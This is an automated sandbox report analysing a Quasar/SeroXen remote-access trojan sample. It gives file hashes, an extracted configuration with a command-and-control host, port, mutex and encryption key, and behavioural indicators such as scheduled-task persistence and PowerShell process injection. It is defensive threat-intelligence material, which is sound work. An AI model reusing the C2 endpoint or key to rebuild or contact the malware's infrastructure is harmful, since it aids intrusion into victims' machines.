Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1800s -
max time network
1504s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
11/05/2024, 08:37
General
-
Target
Uni.exe
-
Size
409KB
-
MD5
4c2bb0618a6eda615c8001d5a7ccd6c0
-
SHA1
c88d2c8bfc5906a5cfef78893d1132edcffd71f0
-
SHA256
abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6
-
SHA512
6abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027
-
SSDEEP
12288:rpg6M1i1v6q1ak/e7xlX7nnvGAwhJLJO:lxqiii6xlLvGjhO
Malware Config
Extracted
quasar
3.1.5
SeroXen
tue-jake.gl.at.ply.gg:29058
$Sxr-xPAuDxLNyBmZ7S2WLJ
-
encryption_key
Pw78RUs175dFrKD7lMwH
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
SeroXen
-
subdirectory
SubDir
Signatures
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/memory/3584-1-0x0000000000390000-0x00000000003FC000-memory.dmp family_quasar behavioral1/files/0x001a00000002ab3b-11.dat family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 2304 created 2184 2304 WerFault.exe 128 -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 2572 created 632 2572 powershell.EXE 5 PID 908 created 632 908 powershell.EXE 5 PID 3804 created 632 3804 powershell.EXE 5 PID 4636 created 2184 4636 svchost.exe 128 -
Executes dropped EXE 5 IoCs
pid Process 4132 Client.exe 4416 install.exe 2812 install.exe 656 tUCkOmZwRnsY.exe 2156 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 10 raw.githubusercontent.com 25 raw.githubusercontent.com 1 raw.githubusercontent.com 4 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk DllHost.exe File opened for modification C:\Windows\System32\Tasks\$77Client.exe svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\$77svc64 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Privacy-Auditing%4Operational.evtx svchost.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2572 set thread context of 2600 2572 powershell.EXE 94 PID 908 set thread context of 4876 908 powershell.EXE 95 PID 3804 set thread context of 4800 3804 powershell.EXE 125 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5104 SCHTASKS.exe 4424 schtasks.exe 2036 SCHTASKS.exe 2132 schtasks.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\11ef2c29_0 svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\11ef2c29_0\ = "{2}.\\\\?\\hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\elineouttopo/00010001|\\Device\\HarddiskVolume2\\Users\\Admin\\AppData\\Local\\Temp\\tUCkOmZwRnsY.exe%b{00000000-0000-0000-0000-000000000000}" svchost.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE -
Modifies registry class 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\MuiCache ScreenClippingHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 = "\\\\?\\Volume{E9075ED3-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3f8be388a6e5d5acd16bab84d000b62642e0ed51d2c81a8c6f3d4368ea05250f" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = "\\\\?\\Volume{E9075ED3-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3f8be388a6e5d5acd16bab84d000b62642e0ed51d2c81a8c6f3d4368ea05250f" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = "\\\\?\\Volume{E9075ED3-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\edc232bc484ce24bf6217939837fc6cbf03892ad9dff10d3c6fe8cbac931b9a6" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000044accec381a3da0144accec381a3da0144accec381a3da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ab5825482000656463323332626334383463653234626636323137393339383337666336636266303338393261643964666631306433633666653863626163393331623961360000b20009000400efbeab582548ab5825482e00000000000000000000000000000000000000000000000000bc227900650064006300320033003200620063003400380034006300650032003400620066003600320031003700390033003900380033003700660063003600630062006600300033003800390032006100640039006400660066003100300064003300630036006600650038006300620061006300390033003100620039006100360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001e6bfc981000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65646332333262633438346365323462663632313739333938333766633663626630333839326164396466663130643363366665386362616339333162396136000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000075626c6e6a7268660000000000000000e402feced506964aba942aaf5ab964638f48d9e434feee118e664e00a0a556b8e402feced506964aba942aaf5ab964638f48d9e434feee118e664e00a0a556b8d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003400370034003400390030003100340033002d0033003200320031003200390032003300390037002d0034003100360038003100300033003500300033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d35e07e9000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000003cd2f4c381a3da01357f43c481a3da01357f43c481a3da01564407000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ab5825482000656463323332626334383463653234626636323137393339383337666336636266303338393261643964666631306433633666653863626163393331623961360000b20009000400efbeab582548ab5825482e00000000000000000000000000000000000000000000000000bc227900650064006300320033003200620063003400380034006300650032003400620066003600320031003700390033003900380033003700660063003600630062006600300033003800390032006100640039006400660066003100300064003300630036006600650038006300620061006300390033003100620039006100360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001e6bfc981000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65646332333262633438346365323462663632313739333938333766633663626630333839326164396466663130643363366665386362616339333162396136000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000075626c6e6a7268660000000000000000e402feced506964aba942aaf5ab964639148d9e434feee118e664e00a0a556b8e402feced506964aba942aaf5ab964639148d9e434feee118e664e00a0a556b8d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003400370034003400390030003100340033002d0033003200320031003200390032003300390037002d0034003100360038003100300033003500300033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d35e07e9000000000000d01200000000000000000000000000000000 RuntimeBroker.exe 